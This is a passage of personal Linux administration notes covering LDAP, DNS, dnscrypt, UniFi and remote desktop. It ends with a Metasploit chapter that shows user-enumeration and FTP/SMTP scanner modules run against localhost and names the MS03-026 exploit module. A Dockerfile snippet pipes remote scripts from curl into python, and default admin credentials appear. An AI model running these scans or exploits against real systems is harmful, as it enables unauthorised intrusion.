$ du --max-depth=1 /home/ | sort -n -r $ du -H --max-depth=1 /home/user $ du -h --max-depth=1 | sort -hr http://www.ducea.com/2006/05/14/tip-how-to-sort-folders-by-size-with-one-command-line-in-linux/ http://unix.stackexchange.com/questions/185764/how-do-i-get-the-size-of-a-directory-on-the-command-line

30.3.12 How to Free Up a Lot of Disk Space by Deleting Cached Package Files

$ sudo du -h /var/cache/apt/archives $ sudo apt-get clean

Disable Automatic Package Caching If you’d rather not have to go in and clean out the cache folders all the time, you can tell Ubuntu to stop keeping them around with a simple configuration change. Head into System –> Administration –> Synaptic Package Manager. Then choose Settings –> Preferences Switch over to the Files tab, where you can change the option to “Delete downloaded packages after installation”, which will prevent the caching entirely.

184 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

30.3.13 Mount unknown filesystem exfat

$ sudo apt-get install exfat-fuse exfat-utils

30.4 Memory

30.4.1 How to see system and process memory usage

$ apt-get install sysstat $ pidstat -r $ pidstat -r -p $(pidof java)

This will show both your memory and your swap usage:

# Size options are: -k, -m, -g $ free -m

30.5 CPU and Process

30.5.1 Display a tree of processes

$ pstree

30.6 GPU

30.6.1 How to measure GPU usage? https://askubuntu.com/questions/387594/how-to-measure-gpu-usage nvidia-smi https://developer.nvidia.com/nvidia-system-management-interface

$ watch nvidia-smi

$ nvidia-smi --loop-ms=1000 gpustat https://github.com/wookayin/gpustat

$ pip install gpustat $ gpustat $ gpustat -cp $ gpustat -cpi $ watch gpustat

30.4. Memory 185 Omid Raha MyStack Documentation, Release 0.1

NOTE: This works with NVIDIA Graphics Devices only glances https://github.com/nicolargo/glances

$ pip install glances $ pip install glances[gpu]

30.6.2 Windows

GPU-Z https://www.techpowerup.com/gpuz/

30.7 LDAP http://www.debian-administration.org/articles/585#ldap-test1

30.7.1 Install LDAP packages

# apt-get install slapd ldap-utils libdb4.6 # dpkg-reconfigure slapd

30.7.2 Configure LDAP package

# dpkg-reconfigure slapd Configuring slapd

˓→

˓→ If you enable this option, no initial configuration or database will be created

˓→for you.

˓→ Omit OpenLDAP server configuration?

˓→

˓→ []

˓→

˓→

˓→

Configuring slapd

˓→ The DNS domain name is used to construct the base DN of the LDAP directory. For

˓→example, (continues on next page)

186 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) 'foo.example.org' will create the directory with 'dc=foo, dc=example, dc=org' as

˓→base DN.

˓→ DNS domain name:

˓→

˓→ bws.example.com______

˓→______

˓→

˓→

˓→

Configuring slapd

˓→ Please enter the name of the organization to use in the base DN of your LDAP

˓→directory.

˓→ Organization name:

˓→

˓→ example.com______

˓→______

˓→

˓→

˓→

˓→

Configuring slapd Please enter the password for the admin entry in your LDAP directory.

Administrator password:

********______

Configuring slapd Please enter the admin password for your LDAP directory again to verify that you have typed it correctly.

Confirm password:

(continues on next page)

30.7. LDAP 187 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) ********______

Configuring slapd The HDB backend is recommended. HDB and BDB use similar storage formats, but HDB adds support for subtree renames. Both support the same configuration options.

In either case, you should review the resulting database configuration for your needs. See /usr/share/doc/slapd/README.DB_CONFIG.gz for more details.

Database backend to use:

[BDB] HDB

Configuring slapd

Do you want the database to be removed when slapd is purged?

[]

Configuring slapd

There are still files in /var/lib/ldap which will probably break the configuration process. If you enable this option, the maintainer scripts will move the old database files out of the way before creating a new database.

Move old database?

[]

Configuring slapd

The obsolete LDAPv2 protocol is disabled by default in slapd. Programs and users should upgrade to LDAPv3. If you have old programs which can't use LDAPv3, you should select this option and 'allow bind_v2' will (continues on next page)

188 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) be added to your slapd.conf file.

Allow LDAPv2 protocol?

[]

30.7.3 Initial LDAP configuration

# vim /etc/ldap/ldap.conf

BASE dc=bws,dc=example,dc=com URI ldap://172.16.1.200/

# vim /usr/share/slapd/slapd.conf

loglevel 256 index objectClass eq index uid eq

# invoke-rc.d slapd stop # slapindex # chown openldap:openldap /var/lib/ldap/* # invoke-rc.d slapd start

30.7.4 Initial test

#ldapsearch -x #sudo slapcat

30.7.5 Creating basic tree structure

# vim ou.ldif dn: ou=People,dc=bws,dc=example,dc=com ou: People objectClass: organizationalUnit

30.7.6 Load the LDIF file into the server

# invoke-rc.d slapd stop # slapadd -c -v -l ou.ldif # invoke-rc.d slapd start

30.7. LDAP 189 Omid Raha MyStack Documentation, Release 0.1

30.7.7 Test LDIF

# ldapsearch -x ou=people

30.7.8 Creating user accounts

# vim users.ldif

dn: cn=omidraha,dc=bws,dc=example,dc=com objectClass: person objectClass: top cn: omidraha sn: omidraha

30.7.9 Load the LDIF file into the server

# ldapadd -x -D "cn=admin,dc=bws,dc=example,dc=com" -W -f users.ldif

30.7.10 To define the new user’s password

# ldappasswd -x -D cn=admin,dc=bws,dc=example,dc=com -W -S cn=omidraha,dc=bws,

˓→dc=example,dc=com

30.7.11 Verify the user entry has been created

# ldapsearch -x cn=omidraha

30.7.12 Sample python code to test def auth_by_ldap(username, password, domain='dc=bws,dc=example,dc=com', server='ldap:/

˓→/localhost/'): import ldap con= ldap.initialize(server) dn='cn={},{}'.format(username, domain) try: con.simple_bind_s(dn, password.encode('utf8')) except ldap.INVALID_CREDENTIALS: return False return True

30.8 Cent OS

30.8.1 EPEL https://fedoraproject.org/wiki/EPEL

190 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1 http://kartolo.sby.datautama.net.id/EPEL/7/x86_64/repoview/epel-release.html http://kartolo.sby.datautama.net.id/EPEL/7/x86_64/e/epel-release-7-1.noarch.rpm

$ curl -O http://kartolo.sby.datautama.net.id/EPEL/7/x86_64/e/epel-release-7-1.noarch.

˓→rpm # rpm -ivh epel-release-6-8.noarch.rpm $ rm epel-release-6-8.noarch.rpm

30.9 Debian

30.9.1 Removed unused packages http://www.waveguide.se/?article=how-to-quickly-remove-all-unused-packages-under-debian https://www.debian-administration.org/article/134/Removing_unnecessary_packages_with_deborphan

$ deborphan $ deborphan --guess-data $ deborphan --guess-all $ dpkg --purge`deborphan --guess-all`

$ egrep '^Status: |^Package: ' /var/lib/dpkg/status | egrep -B1 'half-installed|half-

˓→configured|unpacked|triggers-awaited|triggers-pending' $ dpkg --audit

30.9.2 Annoying autorenaming in Guake http://askubuntu.com/questions/254566/annoying-autorenaming-in-guake First install gconf-editor

$ sudo apt-get install gconf-editor

Then run gconf-editor and browse to /apps/guake/general and unmarked use_vte_titles key

30.9.3 How do you uninstall a library in Linux? http://stackoverflow.com/questions/1439950/whats-the-opposite-of-make-install-ie-how-do-you-uninstall-a-library-in-lin If sudo make uninstall is unavailable: In a debian based system, instead of doing make install you can run sudo checkinstall (or .rpm etc. equivalent) to make a .deb that is also automatically installed. You can then remove it using synaptic

$ sudo checkinstall

30.9. Debian 191 Omid Raha MyStack Documentation, Release 0.1

30.9.4 Thunderbird

The Icedove debian package is an unbranded Thunderbird The is a security extension to and Seamonkey. It enables you to write and receive email messages signed and/or encrypted with the OpenPGP standard. Sending and receiving encrypted and digitally signed email is simple using Enigmail.

30.9.5 Yandex Setting up mail clients https://help.yandex.com/mail/mail-clients.xml

30.9.6 How to adjust screen lock settings on Linux debian desktop

To adjust screen lock settings from the command line, you can edit ~/.kde/share/config/kscreensaverrc. Create the file if it does not exist. Once the file is edited, the change will automatically take effect immediately.

$ vi ~/.kde/share/config/kscreensaverrc

[ScreenSaver] Lock=true LockGrace=300000 PlasmaEnabled=false Timeout=900

30.9.7 How to install Google Earth on Debian

# aptitude install googleearth-package $ make-googleearth-package $ apt-get install -f # dpkg -i googleearth_4.2.205.5730+0.5.2-1_i386.deb

30.9.8 Restarting Networking

# systemctl restart networking # systemctl restart network-manager https://wiki.debian.org/NetworkManager

30.9.9 Package manager is locked

$ rm /var/lib/dpkg/lock /var/cache/apt/archives/lock /var/lib/apt/lists/lock

30.9.10 Some index files failed to download

192 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

$ sudo apt-get update E: Some index files failed to download. They have been ignored, or old ones used

˓→instead.

It means that these sources cannot be reached, try selecting another server to fetch from.

30.10 Ubuntu

30.10.1 Ubuntu Server

Ubuntu Server 14.04.3 LTS The Long Term Support version of Ubuntu Server, including the Icehouse release of OpenStack and support guaranteed until April 2019 — 64-bit only. Ubuntu Server 15.10 The latest version of Ubuntu Server, including the Liberty release of OpenStack and support for nine months – 64-bit only.

30.10.2 SSH only allows public key authentication when you first login with pass- word because I encrypted my home directory. SSH can’t read the authorized_keys file until you log in, so basically it forces you to password authenticate first. See the troubleshooting section of the following: https://help.ubuntu.com/community/SSH/OpenSSH/Keys

$ sudo mkdir /etc/ssh/ $ sudo chown : /etc/ssh/ $ sudo chmod 755 /etc/ssh/ $ mv ~/.ssh/authorized_keys /etc/ssh/ $ chmod 644 /etc/ssh//authorized_keys $ chown : /etc/ssh//authorized_keys $ sudo vim /etc/ssh/sshd_config AuthorizedKeysFile /etc/ssh/%u/authorized_keys $ sudo service ssh restart

$ ssh # Note: Now you can see an empty home directory with default files, # and some files about unmounted encrypted partition. # And you need to run ``-mount-private`` command and enter password for

˓→encryption partition $ ecryptfs-mount-private http://askubuntu.com/a/162270

30.10.3 Checks the Ubuntu version

30.10. Ubuntu 193 Omid Raha MyStack Documentation, Release 0.1

# give you the the description including the OS name $ lsb_release -d # will give you just the codename $ lsb_release -c # For the release number only, use $ lsb_release -r # For all lsb version details, use $ lsb_release -a http://askubuntu.com/questions/150917/what-terminal-command-checks-the-ubuntu-version

30.10.4 ubuntu UFW

Ubuntu’s default firewall (UFW: Uncomplicated Firewall) denies all forwarding traffic by default, which is needed by docker. Enable forwarding with UFW: Edit UFW configuration using the nano text editor.

$ sudo vim /etc/default/ufw

Scroll down and find the line beginning with DEFAULT_FORWARD_POLICY. Replace:

DEFAULT_FORWARD_POLICY="DROP"

With:

DEFAULT_FORWARD_POLICY="ACCEPT"

Finally:

$ sudo ufw reload https://www.digitalocean.com/community/tutorials/docker-explained-how-to-containerize-python-web-applications

30.10.5 Connect to wireless network manually nmcli

Check to see which ESSID we can see:

$ sudo apt-get install network-manager $ nmcli dev wifi

Verify the name of the ESSID and we proceed on using it on the next line including the password needed for it (This includes WEP and WPA type passwords):

$ nmcli dev wifi connect ESSID_NAME password ESSID_PASSWORD

194 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

Automatic Wireless Connection on Login sudo nano /etc/network/interfaces auto wlan0 iface wlan0 inet static address ASSIGNED_IP netmask 255.255.255.0 gateway THE_GATEWAY wireless-essid YOURSSID wireless-key WIRELESSKEY_HERE https://askubuntu.com/questions/16584/how-to-connect-and-disconnect-to-a-network-manually-in-terminal sudo apt-get install wpasupplicant sudo apt-get install wireless-tools

30.10.6 Make apt-get not prompt for replacement of configuration files

$ apt-get -o Dpkg::Options::=--force-confnew -y dist-upgrade

–force-confold: do not modify the current configuration file, the new version is installed with a .dpkg-dist suffix. With this option alone, even configuration files that you have not modified are left untouched. You need to combine it with –force-confdef to let dpkg overwrite configuration files that you have not modified. –force-confnew: always install the new version of the configuration file, the current version is kept in a file with the .dpkg- old suffix. –force-confdef: ask dpkg to decide alone when it can and prompt otherwise. This is the default behavior of dpkg and this option is mainly useful in combination with –force-confold. –force-confmiss: ask dpkg to install the configuration file if it’s currently missing (for example because you have removed the file by mistake). https://raphaelhertzog.com/2010/09/21/debian-conffile-configuration-file-managed-by-dpkg/

30.10.7 Upgrade from Ubuntu 16.0.4 to Ubuntu Linux 18.04

$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.5 LTS Release: 16.04 Codename: xenial $ sudo do-release-upgrade $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename:

30.10. Ubuntu 195 Omid Raha MyStack Documentation, Release 0.1

30.11 Systemd

# systemd # systemctl status nginx # journalctl -f # journalctl -f -u nginx # ls -la /run/log/journal/ # ps auxf https://en.wikipedia.org/wiki/Systemd

30.12 DNS.

30.12.1 Transparent DNS proxies

Some ISP’s are now using a technology called ‘Transparent DNS proxy’. Using this technology, they will intercept all DNS lookup requests (TCP/UDP port 53) and transparently proxy the results. This effectively forces you to use their DNS service for all DNS lookups. If you have changed your DNS settings to use an ‘open’ DNS service such as Google, Comodo or OpenDNS, expecting that your DNS traffic is no longer being sent to your ISP’s DNS server, you may be surprised to find out that they are using transparent DNS proxying.

30.12.2 DNSCrypt

DNSCrypt encrypts and authenticates DNS traffic between user and DNS resolver. While IP traffic itself is unchanged, it prevents local spoofing of DNS queries, ensuring DNS responses are sent by the server of choice. https://wiki.archlinux.org/index.php/DNSCrypt

30.12.3 dnscrypt-proxy

DNSCrypt is a protocol for securing communications between a client and a DNS resolver, preventing spying, spoofing or man-in-the-middle attacks. To use it, you’ll need a tool called dnscrypt-proxy, which “can be used directly as your local resolver or as a DNS forwarder, authenticating requests using the DNSCrypt protocol and passing them to an upstream server”. Check current local DNS service:

$ sudo ss -lp 'sport = :domain'

Netid State Recv-Q Send-Q Local Address:Port Peer

˓→Address:Port (continues on next page)

196 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) udp UNCONN 230400 127.0.0.53%lo:domain0.0.0.0: * ˓→ users:(("systemd-resolve",pid=948,fd=12)) tcp LISTEN0 128 127.0.0.53%lo:domain0.0.0.0: * ˓→ users:(("systemd-resolve",pid=948,fd=13))

Disable systemd-resolve service according to the above output:

$ sudo systemctl stop systemd-resolved $ sudo systemctl disable systemd-resolved

Check current local DNS service again:

$ sudo ss -lp 'sport = :domain'

Uninstall old version:

$ sudo apt-get purge dnscrypt-proxy

Install new version:

$ sudo add-apt-repository ppa:shevchuk/dnscrypt-proxy $ sudo apt update $ sudo apt install dnscrypt-proxy

Configs:

$ sudo cat /etc/resolv.conf

# Generated by NetworkManager nameserver 127.0.2.1

$ cat /etc/dnsmasq.d/dnscrypt-proxy

# Redirect everything to dnscrypt-proxy no-resolv server=127.0.2.1 proxy-dnssec

Now you can see all your dns query is secured with type quic on the filter box of wireshark And view related listening port:

# netstat -uanp

Active Internet connections(servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State

˓→PID/Program name udp00 127.0.0.1:400.0.0.0: * 1/ ˓→init udp000.0.0.0:530.0.0.0: * ˓→3089/dnsmasq udp000.0.0.0:680.0.0.0: * ˓→2000/dhclient udp000.0.0.0:680.0.0.0: * ˓→2221/dhclient udp000.0.0.0:339080.0.0.0: * ˓→853/dnscrypt-proxy (continues on next page)

30.12. DNS. 197 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) udp600 :::53 ::: * ˓→3089/dnsmasq

Check service status:

$ sudo systemctl status dnscrypt-proxy https://github.com/jedisct1/dnscrypt-proxy https://wiki.archlinux.org/index.php/DNSCrypt https://github.com/jedisct1/dnscrypt-proxy/wiki/Installation-linux https://github.com/jedisct1/dnscrypt-proxy/wiki/Installation-Debian-Ubuntu

30.12.4 resolveconf

$ /etc/resolv.conf

Normally the resolvconf program is run only by network interface configuration programs such as ifup(8), ifdown, NetworkManager(8), dhclient(8), and pppd(8); and by local nameservers such as dnsmasq(8). These programs obtain nameserver information from some source and push it to resolvconf.

$ resolvconf $ /etc/network/interface https://wiki.debian.org/HowTo/dnsmasq https://sfxpt.wordpress.com/2011/02/06/providing-dhcp-and-dns-services-with-dnsmasq/

30.12.5 dnssec-trigger and unbound

# apt-get inastall dnssec-trigger # apt-get inastall unbound

30.12.6 How do install dig?

$ sudo apt-get install dnsutils http://askubuntu.com/a/25100/237607

30.12.7 Disable builtin dnsmasq on the network manager

$ pstree -sp $(pidof dnsmasq) $ lsof -i :53 $ netstat -uanp

198 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

$ sudo vim /etc/NetworkManager/NetworkManager.conf

[main] plugins=ifupdown,keyfile,ofono # dns=dnsmasq

$ sudo service network-manager restart $ sudo service networking restart $ killall -9 dnsmasq https://unix.stackexchange.com/a/304129

30.12.8 Deploying a DNS Server using Docker http://www.damagehead.com/blog/2015/04/28/deploying-a-dns-server-using-docker/

$ docker run --name bind -it --rm \ --publish 53:53/tcp --publish 53:53/udp --publish 10000:10000/tcp \ --volume /srv/docker/bind:/data \ sameersbn/bind:9.9.5-20170129

We create the forward zone example.com by selecting Create master zone and in the Create new zone dialog set the Zone type to Forward, the Domain Name to example.com, the Master server to ns.example.com and set Email address to the domain administrator’s email address and select Create. Next, create the DNS entry for ns.example.com pointing to 172.17.42.1 and apply the configuration To complete this tutorial we will create a address (A) entry for webserver.example.com and then add a domain name alias (CNAME) entry www.example.com which will point to webserver.example.com. To create the A entry, select the zone example.com and then select the Address option. Set the Name to webserver and the Address to 192.168.1.1. To create the CNAME entry, select the zone example.com and then select the Name Alias option. Set the Name to www and the Real Name to webserver and apply the configuration. And now, the moment of truth

$ host webserver.example.com 192.168.1.10 $ host www.example.com 192.168.1.10

The 192.168.1.10 is address of dns server( local host machine)

Resolve all domain name to specific IP

$ sudo vim /etc/hosts 127.0.0.1 example.com 127.0.0.1 www.example.com

$ sudo apt-get install dnsmasq

$ sudo vim /etc/dnsmasq.conf conf-dir=/etc/dnsmasq.d/,*.conf

$ sudo vim /etc/dnsmasq.d/demo.conf no-dhcp-interface=wlp3s0 (continues on next page)

30.12. DNS. 199 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) bogus-priv address=/#/192.168.1.10

$ sudo systemctl restart dnsmasq

The 192.168.1.10 is address of dns server( local host machine)

Disable systemd-resolved

That systemd-resolved cannot be uninstalled, but can be disabled with the following commands:

$ sudo systemctl disable systemd-resolved.service $ sudo systemctl stop systemd-resolved

Check possibly already listening to port 53

$ ss -lp 'sport = :domain'

Install proxychains4

$ apt-get install proxychains4

$ proxychains4 curl google.com https://github.com/rofl0r/proxychains-ng

30.13 Libreo Office

30.13.1 How to change the text direction in LibreOffice?

Enable Complex Text Layout (CTL) support using (sources: 1, 2, 3): Tools → Options → Language Settings → Languages It may be necessary to restart LibreOffice after enabling CTL. Then: Ctrl+Shift+D or Ctrl+Right Shift - switch to right-to-left text entry Ctrl+Shift+A or Ctrl+Left Shift - switch to left-to-right text entry. If the shortcuts don’t work using Left Ctrl, try Right Ctrl. http://superuser.com/questions/543559/how-to-change-the-text-direction-in-libreoffice

200 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

30.14 Webdav

Upload a file

$ sudo apt-get install cadaver $ cadaver https://example.com/webdav Username: Password: $ dav:/webdav/> put /path/of/file/on/local/to/upload/to/remote/server

http://accc.uic.edu/answer/how-do-i-access-webdisks-linux-or-unix https://docs.oracle.com/cd/E21764_01/portal.1111/e10235/webdav007.htm

30.15 Remote Desktop

30.15.1 Configure users to connect to Debian from a Windows machine using Re- mote Desktop

$ sudo apt-get install $ sudo apt-get install xfce4 $ apt-get install xfce4 xfce4-goodies gnome-icon-theme $ echo xfce4-session >~/.xsession

For good measure, it is a good idea to edit the startwm.sh file to ensure that XRDP will always use xfce4 Add the following lines at the end of the file:

$ sudo vim /etc/xrdp/startwm.sh . /etc/X11/Xsession . /usr/bin/startxfce4

Then using the RDP client from Windows 7, mstsc.exe; https://community.spiceworks.com/how_to/92663-configure-users-to-connect-to-ubuntu-14-04-from-a-windows-machine-using-remote-desktop http://scarygliders.net/2011/11/17/x11rdp-ubuntu-11-10-gnome-3-xrdp-customization-new-hotness/?PageSpeed= noscript if not works:

$ sudo apt-get install tightvncserver $ sudo adduser vnc $ gpasswd -a vnc sudo $ mkdir /home/vnc $ chown -R vnc:vnc /home/vnc

30.16 Wireless

30.16.1 unifi

By package:

30.14. Webdav 201 Omid Raha MyStack Documentation, Release 0.1

$ sudo dpkg -i unifi_sysvinit_all.deb $ sudo service mongodb restart $ sudo systemctl restart unifi https://www.ubnt.com/download/unifi/unifi-ap-ac-lr/default/unifi-5723-controller-debianubuntu-linux By Docker:

$ docker run --rm --init -p 8080:8080 -p 8443:8443 -p 3478:3478/udp -p 10001:10001/

˓→udp -eTZ='Asia/Tehran' -v ~/ws/unifi/data:/var/lib/unifi -v ~/ws/unifi/logs:/var/

˓→log/unifi --name unifi jacobalberty/unifi:5.7.28-sc https://github.com/jacobalberty/unifi-docker Browse the web ui: https://localhost:8443/ Setup DHCP and DNS server:

$ sudo vim /etc/dnsmasq.conf conf-dir=/etc/dnsmasq.d/,*.conf

$ sudo vim /etc/dnsmasq.d/demo.conf # no-dhcp-interface=wlp3s0 #interface=enp2s0 #bogus-priv address=/#/192.168.1.10 dhcp-range=192.168.1.10,192.168.1.20,12h dhcp-lease-max=25 dhcp-option=option:router,192.168.1.1

Setup network:

# Device > Config > Network > Configure IP (using DHCP)

Device > Config > Network > Configure IP(static IP) IP address: 192.168.1.2 Subnet mask: 255.255.255.0 Gateway: 192.168.1.10

Device > Details > Overview > IP: 192.168.1.2 # @note: The 192.168.1.2 is AP IP

Device > Adopt > IP: 192.168.1.2 # @note: The 192.168.1.2 is AP IP username: admin password: admin port: 22 inform: http://192.168.1.10:8080/inform # @note: The 192.168.1.10, is unifi

˓→(docker on your pc) server ip

202 Chapter 30. Linux Omid Raha MyStack Documentation, Release 0.1

or@or:~$ ifconfig 192.168.1.10 or@or:~$ ssh [email protected] box# info status: connected(http://192.168.1.10:8080/inform)

Settings > Site > Device > Authentication

ssh auth: admin admin

Settings > Network > Parent Interface: LAN Gateway/Subnet: 192.168.1.10/24 DHCP mode: None

Settings > Wireless Network > Define a new wireless

How Automatic Detection of Captive Portal works

Basic strategy behind Captive Portal detection The Automatic Detection of Captive Portal mechanism is based on a simple verification, done by the Operational System (OS) of the client device (smartphone, tablet, laptop). It simply tries to reach a specific URL and verify that such URL returns a well-known result. If a Captive Portal is not in place, the result will match the expected one and the OS will know that there is full access to internet. If the URL returns a result other than the expected one, then the OS will detect that there is a Captive Portal in place and that it’s needed to proceed with authentication in order to get full access to internet: in this case the OS will open the Splash Page automatically. Differences between Client devices All client devices use the above described strategy to find out if they are behind a captive portal, but the URL might vary depending on the specific model of smartphone, tablet, laptop and depending on the specific OS version. In the following you can find the list of domains that are contacted by each model in order to detect the captive portal. If the domain is accessible and returns “Success”, the Captive Portal is not triggered automatically. “Success” response means the device is connected to the internet. Android Captive Portal Detection clients3.google.com Apple iPhone, iPad with iOS 6 Captive Portal Detection gsp1.apple.com *.akamaitechnologies.com www.apple.com apple.com Apple iPhone, iPad with iOS 7, 8, 9 and recent versions of OS X www.appleiphonecell.com *.apple.com www.itools.info www.ibook.info www.airport.us

30.16. Wireless 203 Omid Raha MyStack Documentation, Release 0.1

www.thinkdifferent.us *.apple.com.edgekey.net *.akamaiedge.net *.akamaitechnologies.com Windows ipv6.msftncsi.com ipv6.msftncsi.com.edgesuite.net www.msftncsi.com www.msftncsi.com.edgesuite.net teredo.ipv6.microsoft.com teredo.ipv6.microsoft.com.nsatc.net https://success.tanaza.com/s/article/How-Automatic-Detection-of-Captive-Portal-works

204 Chapter 30. Linux CHAPTER 31

Machine Learning

Contents:

31.1 Tips

31.1.1 Optical mark recognition (OMR) https://en.wikipedia.org/wiki/Optical_mark_recognition openkm

$ docker pull openkm/openkm $ docker run --name openkm -p8000:8080 openkm/openkm

Browse: http://127.0.0.1:8000 username: okmAdmin password: admin sads https://github.com/sdaps/sdaps https://sdaps.org/Documentation/Tutorial/

$ docker pull lsakalauskas/sdaps

$ docker run --rm -v"$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps setup_tex /ws/

˓→omr/example.tex

(continues on next page)

205 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) $ docker run --rm -v"$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps add /ws/omr/

˓→example.tif

# Processing /ws/omr/example.tif # Done

$ docker run --rm -v"$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps annotate

$ docker run --rm -v"$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps recognize

# 3 sheets # 0.493762 seconds per sheet

$ docker run --rm -v"$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps report

$ docker run --rm -v"$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps csv export https://github.com/tfitz/docker-sdaps The example.tex file is here: https://sdaps.org/Documentation/Tutorial/example.tex The example.tif file is here: https://sdaps.org/Documentation/Tutorial/example.tif Scanning: https://sdaps.org/Documentation/Scanning/

206 Chapter 31. Machine Learning CHAPTER 32

Hg Mercurial

Contents:

32.1 Tips

32.1.1 Sample .hgignore file

.pydevproject .project .DS_Store .idea

syntax: glob

.logs/* .settings/* captcha/* django/* test_*.py test.py temp.py settings_override.py *Thumbs.db Debug *.pyc *~ *.py~ *.html~ *.svn .directory .#* #* (continues on next page)

207 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) *.db *.bat *.sh *.orig *.~

32.2 Plugins

32.2.1 Hg edit history plugin http://mercurial.selenic.com/wiki/HisteditExtension

208 Chapter 32. Hg Mercurial CHAPTER 33

Metasploit

Contents:

33.1 Tips

33.1.1 Configure db

# service postgresql start

# adduser msf # passwd msf root@local:/# su - postgres postgres@local:~$ psql postgres=# CREATE DATABASE msf; postgres=# CREATE USER msf WITH PASSWORD 'msf'; postgres=# GRANT ALL PRIVILEGES ON DATABASE msf to msf; root@local:/# msfconsole msf > db_status [*] postgresql selected, no connection

$ db_connect msf:[email protected]:5432/msf [*] Rebuilding the module cache in the background... msf > db_status [*] postgresql connected to msf msf > search ftp (continues on next page)

209 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) msf > db_rebuild_cache [*] Purging and rebuilding the module cache in the background... msf >

33.1.2 SSH Username Enumeration msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(ssh_enumusers)> set RHOSTS 127.0.0.1 RHOSTS=> 127.0.0.1 msf auxiliary(ssh_enumusers)> set USER_FILE /home/msf/user_list USER_FILE=> /home/msf/user_list msf auxiliary(ssh_enumusers) > run

[*] 127.0.0.1:22 - SSH - Checking for false positives [*] 127.0.0.1:22 - SSH - Starting scan [+] 127.0.0.1:22 - SSH - User 'root' found [+] 127.0.0.1:22 - SSH - User 'admin' found [!] 127.0.0.1:22 - SSH - User 'administrator' not found [*] Scanned1 of1 hosts(100% complete) [*] Auxiliary module execution completed

33.1.3 Anonymous FTP Access Detection msf > use auxiliary/scanner/ftp/anonymous msf auxiliary(anonymous)> set RHOSTS 127.0.0.1 msf auxiliary(anonymous) > run

[+] 127.0.0.1:21 - Anonymous READ(220(vsFTPd2.2.2)) 220 Ready) [*] Scanned1 of1 hosts(100% complete) [*] Auxiliary module execution completed

33.1.4 FTP Version Scanner msf > use auxiliary/scanner/ftp/ftp_version

33.1.5 SMTP User Enumeration Utility msf > use auxiliary/scanner/smtp/smtp_enum msf auxiliary(smtp_enum)> set RHOSTS 127.0.0.1 msf auxiliary(smtp_enum) > run (continues on next page)

210 Chapter 33. Metasploit Omid Raha MyStack Documentation, Release 0.1

(continued from previous page)

[*] 127.0.0.1 could not be enumerated(no EXPN, no VRFY, invalid RCPT) [*] Scanned1 of1 hosts(100% complete) [*] Auxiliary module execution completed msf auxiliary(smtp_enum)> set RHOSTS 127.0.0.2 msf auxiliary(smtp_enum) > run

[+] 127.0.0.2:25 Users found: , postmaster [*] Scanned1 of1 hosts(100% complete) [*] Auxiliary module execution completed

33.1.6 SMTP Open Relay Detection

msf > use auxiliary/scanner/smtp/smtp_relay

33.1.7 SMTP Banner Grabber

msf > use auxiliary/scanner/smtp/smtp_version

33.1.8 MS03-026 Microsoft RPC DCOM Interface Overflow

msf > use exploit/windows/dcerpc/ms03_026_dcom

This module exploits a stack buffer overflow in the RPCSS service, this vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :) http://www.rapid7.com/db/modules/exploit/windows/dcerpc/ms03_026_dcom https://community.rapid7.com/community/metasploit/blog/2013/03/12/exploit-popularity-contest

33.1.9 Docker file

# install setup tools curl https://bitbucket.org/pypa/setuptools/raw/bootstrap/ez_setup.py | python - # install pip curl -L https://raw.github.com/pypa/pip/master/contrib/get-pip.py | python - # install python-dev aptitude install python-dev gcc

33.1. Tips 211 Omid Raha MyStack Documentation, Release 0.1

212 Chapter 33. Metasploit CHAPTER 34

Mobile Programming

Contents:

34.1 Tips

Frameworks Comparison • Wiki: Multiple Phone Web-based • Mobile Frameworks Comparison Chart Frameworks • jQuery Mobile jQuery Mobile Wiki: jQuery Mobile • jQTouch JQTouch • Sencha Touch Sencha Touch • PhoneGap Wiki: PhoneGap PhoneGap • Cordova Platform (Rendering Engine) • iOS (Webkit) • Android (Webkit) • Windows Mobile (Trident) • Windows Phone (Trident) • Blackberry OS (Webkit) • Symbian (Webkit/Gecko) • MeeGo (Gecko) • (Gecko)

213 Omid Raha MyStack Documentation, Release 0.1

• WebOS (Webkit) • Bada (Webkit) • Java ME Mobile Target • Mobile website A mobile Website is technically the same as a regular website except that it’s size is adjusted to the smaller screen. It has an adaptive layout. • WebApp A WebApp is like a regular mobile website but it behaves and is used like a native app. The user interface looks like a native app but technologies used are those of the web. • Native app A native app is created for a specific platform and uses the required technologies such as an specific SDK or development language. • Hybrid app A HybridApp is a WebApp that is compiled into a native app. Additional native features can be added to the WebApp which is then distributed as a native app. Ebooks Building Android Apps with HTML, CSS, and JavaScript: Making Native Apps with Standards-Based Web Tools

34.1.1 Push notification https://firebase.google.com/docs/cloud-messaging/ http://openpush.im/ https://docs.pusher.com/push-notifications/android/configure-fcm https://documentation.onesignal.com/docs https://pushy.me/docs/api/send-notifications

34.2 Sencha Touch

34.2.1 Native Packaging for Mobile Devices

Native Packaging

34.2.2 Creating a New Application

